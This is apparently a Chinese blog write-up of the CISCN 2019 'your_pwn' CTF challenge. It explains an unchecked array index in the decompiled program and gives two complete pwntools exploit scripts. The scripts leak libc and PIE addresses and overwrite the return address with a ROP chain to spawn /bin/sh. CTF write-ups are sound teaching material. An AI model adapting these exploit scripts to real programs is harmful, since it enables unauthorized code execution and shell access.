国赛your_pwn,PIE保护

最新推荐文章于 2024-01-28 22:34:08 发布
最新推荐文章于 2024-01-28 22:34:08 发布
阅读量1.9k 收藏 9
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/90069051
版权

题目主要代码如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-110h]
  unsigned __int64 v5; // [rsp+108h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  memset(&s, 0, 0x100uLL);
  printf("input your name \nname:", 0LL);
  read(0, &s, 0x100uLL);
  while ( (unsigned int)sub_B35() )
    ;
  return 0LL;
}

_BOOL8 sub_B35()
{
  int v1; // [rsp+4h] [rbp-15Ch]
  int v2; // [rsp+8h] [rbp-158h]
  int i; // [rsp+Ch] [rbp-154h]
  char v4[64]; // [rsp+10h] [rbp-150h]
  char s; // [rsp+50h] [rbp-110h]
  unsigned __int64 v6; // [rsp+158h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  memset(&s, 0, 0x100uLL);
  memset(v4, 0, 0x28uLL);
  for ( i = 0; i <= 40; ++i )
  {
    puts("input index");
    __isoc99_scanf("%d", &v1);
    printf("now value(hex) %x\n", (unsigned int)v4[v1]);
    puts("input new value");
    __isoc99_scanf("%d", &v2);
    v4[v1] = v2;
  }
  puts("do you want continue(yes/no)? ");
  read(0, &s, 0x100uLL);
  return strncmp(&s, "yes", 3uLL) == 0;
}

再查看一下保护,开启了
在这里插入图片描述
但是看到函数sub_B35中数组指针中v1大小没有受到限制,便可以对内存任意地址进行读写。
于是可以读取__libc_start_main的函数的地址,通过此泄露libc的版本获取system函数的地址,并将其写在返回地址上。

于是就只差最后一步参数问题的解决了。由于程序是64位程序参数必须放在寄存器rdi中,我们查询一下pop rdi
在这里插入图片描述
由于开启了PIE保护,这里显示的只是偏移,需要泄露一个函数的地址之后计算偏移差即可,这里选择泄露main函数

在泄露的时候需要注意,该程序打印的是无符号整形,而数组是char类型 如果打印B7他的byte就是-73打印出无符号整形就是FFFFFFB7,所以需要对其进行截断。如果打印出一个字符需要前面补0
exp如下

#!/usr/bin/env python
# coding=utf-8
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from LibcSearcher import *
p=process('./pwn')
#p = remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com","57856")
elf=ELF('./pwn')
#context.log_level='debug'
context.terminal=['deepin-terminal','-x','sh','-c']
libc=ELF('./libc.so.6')
offset_libc_start_main_0xE7=0X278
libc_start_main_0xE7_addr=''
p.recvuntil("name:")
p.sendline('playmaker')
for x in range(8):#leak the addr of libc
    p.recvuntil('input index\n')
    p.sendline(str(offset_libc_start_main_0xE7+x))
    p.recvuntil('(hex) ')
    data=p.recvuntil('\n',drop=True)
    #print data
    if len(data)>=2:
        data=data[-2:]
        data=data[::-1]
    elif len(data)==1:
        data='0'+data
        data=data[::-1]
    libc_start_main_0xE7_addr+=data
    p.recvuntil('input new value\n')
    p.sendline('0')
libc_start_main_0xE7_addr=libc_start_main_0xE7_addr[::-1]
libc_start_main_0xE7_addr=eval("0x"+libc_start_main_0xE7_addr)
libc_start_main_addr=libc_start_main_0xE7_addr-0xE7
#print hex(libc_start_main_0xE7_addr)
#print hex(libc_start_main_addr)

main_addr_AC=''
offset_retn=0x158
for x in range(8):#leak the addr of main_AC
    p.recvuntil('input index\n')
    p.sendline(str(offset_retn+x))
    p.recvuntil('(hex) ')
    data=p.recvuntil('\n',drop=True)
    if len(data)>=2:
        data=data[-2:]
        data=data[::-1]
    elif len(data)==1:
        data='0'+data
        data=data[::-1]
    main_addr_AC+=data
    p.recvuntil('input new value\n')
    p.sendline('0')
main_addr_AC=main_addr_AC[::-1]
main_addr_AC=eval('0x'+main_addr_AC)
main_addr=main_addr_AC-0xac
print hex(main_addr)
pop_rdi=main_addr+0xd03-0xa65
print hex(pop_rdi)

#libc=LibcSearcher('__libc_start_main',libc_start_main_addr)
base_addr=libc_start_main_addr-libc.symbols['__libc_start_main']
system_addr=libc.symbols['system']+base_addr
bin_sh_addr=base_addr+libc.search('/bin/sh').next()
print  hex(libc_start_main_addr)
print  hex(system_addr)
print  hex(bin_sh_addr)


payload=p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
payload=payload.encode("hex")

for x in range(24):
    p.recvuntil('input index\n') 
    p.sendline(str(offset_retn+x))
    p.recvuntil('input new value\n')
    p.sendline(str(eval("0x"+payload[x*2:x*2+2])))

for x in range(1):
    p.recvuntil('input index\n')
    p.sendline('0')
    p.recvuntil('input new value\n')
    p.sendline('0')
p.recv()
#gdb.attach(p)
p.sendline('yes')
sleep(2)
p.interactive()

其实这题也不需要泄露函数地址亦可以拿到shell,在最后返回地址处执行system,设置他上一个函数strncmp的参数为‘/bin/sh’,到system时rdi还没有改变。便可以成功拿到shell

#!/usr/bin/env python
# coding=utf-8
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from LibcSearcher import *
p=process('./pwn')
#p = remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com","57856")
elf=ELF('./pwn')
#context.log_level='debug'
context.terminal=['deepin-terminal','-x','sh','-c']
libc=ELF('./libc.so.6')
offset_libc_start_main_0xE7=0X278
libc_start_main_0xE7_addr=''
p.recvuntil("name:")
p.sendline('playmaker')
for x in range(8):#leak the addr of libc
    p.recvuntil('input index\n')
    p.sendline(str(offset_libc_start_main_0xE7+x))
    p.recvuntil('(hex) ')
    data=p.recvuntil('\n',drop=True)
    #print data
    if len(data)>=2:
        data=data[-2:]
        data=data[::-1]
    elif len(data)==1:
        data='0'+data
        data=data[::-1]
    print data
    libc_start_main_0xE7_addr+=data
    p.recvuntil('input new value\n')
    p.sendline('0')
libc_start_main_0xE7_addr=libc_start_main_0xE7_addr[::-1]
libc_start_main_0xE7_addr=eval("0x"+libc_start_main_0xE7_addr)
libc_start_main_addr=libc_start_main_0xE7_addr-0xE7
#print hex(libc_start_main_0xE7_addr)
#print hex(libc_start_main_addr)


offset_retn=0x158

#for x in range(8)#leak the addr of main_

#libc=LibcSearcher('__libc_start_main',libc_start_main_addr)
base_addr=libc_start_main_addr-libc.symbols['__libc_start_main']
system_addr=libc.symbols['system']+base_addr
bin_sh_addr=base_addr+libc.search('/bin/sh').next()
print  hex(libc_start_main_addr)
print  hex(system_addr)
print  hex(bin_sh_addr)


payload=p64(system_addr)+p64(0xdeadbeef)
payload=payload.encode("hex")


for x in range(16):
    p.recvuntil('input index\n')
    p.sendline(str(offset_retn+x))
    p.recvuntil('input new value\n')
    p.sendline(str(eval("0x"+payload[x*2:x*2+2])))

for x in range(17):
    p.recvuntil('input index\n')
    p.sendline('0')
    p.recvuntil('input new value\n')
    p.sendline('0')
p.recv()
#gdb.attach(p)
p.sendline('/bin/sh')
sleep(2)
p.interactive()
playmak3r
关注
专栏目录
your_pwn
weixin_44319142的博客
05-04 642
your_pwn 溢出点在图的循环中,通过输入v1,可以任意打印栈上的内容,通过输入v2,可以实现向栈上写,每次只能写一个字节,即8bit。 通过漏洞打印出ret地址,得到代码段的基址,然后通过puts打印出puts_got,泄露出libc的地址,然后构造system("/bin/sh")的payload,然后getshell from pwn import * context.log_l...
PIE保护绕过
weixin_30633949的博客
09-14 1804
(一):partial write 开了PIE保护的程序,其低12位地址是固定的,所以我们可以采用partial write。但是我们不能写入一个半字节,所以选择写入两个字节,倒数地位进行爆破,范围是0到f,例如: list1 = ["x05","x15","x25","x35","x45","x55","x65","x75","x85","x95","xa5","xb5","x...
pwn中的pie保护
最新发布
wangxunyu6的博客
01-28 1390
1:多gdb调试,去看自己输入的数据在栈中是什么情况。2:pie和canary以及libc的地址源于泄露,可以多动手操作去尝试。3:经过以上几个题目发现自己写题慢以及做不出题目还是只是少,最后一题的代码审计最开始根本看不懂。。。
PIE保护机制(ASLR保护机制)
Sakura给爷pwn全场
09-07 1846
ASLR内存随机化保护机制
NX Stack Relro PIE四种保护
beidideshu的博客
06-17 1335
保护机制
Linux下的ASLR(PIE)内存保护机制
weixin_30454481的博客
06-13 910
1.1 Linux下的ASLR内存保护机制 1.1.1 Linux下的ASLR工作原理 工作原理与window下的aslr类似 1.1.2 Linux下利用内存地址泄露绕过ASLR ⑴. 原理分析: 那么如何解决地址随机化的问题呢?思路是:我们需要先泄漏出libc.so某些函数在内存中的地址,然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/s...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
2019国赛1.your_pwn
Jc
05-13 1332
1.文件属性
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
暑假pwn训练 第(十一)国赛pwn
doudoudedi
08-16 1039
昨天做了几道pwn题emem 今天也做了2道表示pwn好难被打自闭了… 昨天重新做了一下国赛pwn题发现好像能做几道…当时的自己也是真的菜~~ pwn1就是常规思路泄露libc然后getshell // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const c...
2018 10 15 pwn的学习0x6 aslr保护pie保护
startr4ck
10-15 1477
1.getint 是什么 getint函数将输入的字符流分解后才能整数,且每次调用得到一个整数。 getint需要返回转换得到的整数,并且在到达输入结尾的时候返回文件结束标记 2.什么是stdin stdout 怎么进行利用? C去写文件时的操作,File *fp=fopen(),这个fp就是我们向系统申请的 stdin,stdout,stderr就是这个fp,不过他是随着计算机系统的开启默认打...
PWN】2019-ciscn your——pwn
Joaus的博客
05-05 891
这题的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
刷题小结2:pie与canary保护
weixin_66751120的博客
01-27 952
pie保护开启后也就是所有地址都被随机化了,包括ida与ROPgadget所看到的所有地址都只有最后几位,这是相对于当前随机产生的pie的基址的偏移,那么我们如果能得到pie的基址,就能得到其他地址,从而拿到权限,这里总结的方法是接收pie的基址。先checksec一下,可以看到开启pie保护,同时ida里也不是可以用的地址,而是偏移。那么看主函数主函数的逻辑就是进行两次循环,分别输入1,2,3或者其他进入对应函数case1:非常明显的栈溢出,可以覆盖rbp以及返回地址。
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 2970
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
Linux pwn入门教程(7)——PIE与bypass思路
子曰小玖的博客
06-04 2238
https://bbs.ichunqiu.com/thread-43627-1-1.html 0x00 PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position...
PWN保护机制以及编译方法
逆向萌新的博客
11-07 2716
PWN保护机制以及编译方法
pwn题时的一些调试技巧
zszcr的博客
04-06 5146
当你觉得你的脚本没有问题,但是却又怎么也出你想要的结果时,你就需要用到调试了一个是设置context.log_level="debug"脚本在执行时就会输出debug的信息,你可以通过观察这些信息查找哪步出错了而另一个就是 用pwnlib.gdb.attach(p)在发送payload前加入这条语句,同时加上pause() 时脚本暂停然后就会弹出来一个开启着gdb的终端,你先在gdb中设置好断点然...
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 1071
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
PWN入门(9)NX enabled,PIE enabled与返回LibC库
Ba1_Ma0的博客
10-02 1819
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入08文件夹还是和上一篇文件一样,设置文件权限,将flag设置位只能root可读设置程序位suid位关动态链接库的防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值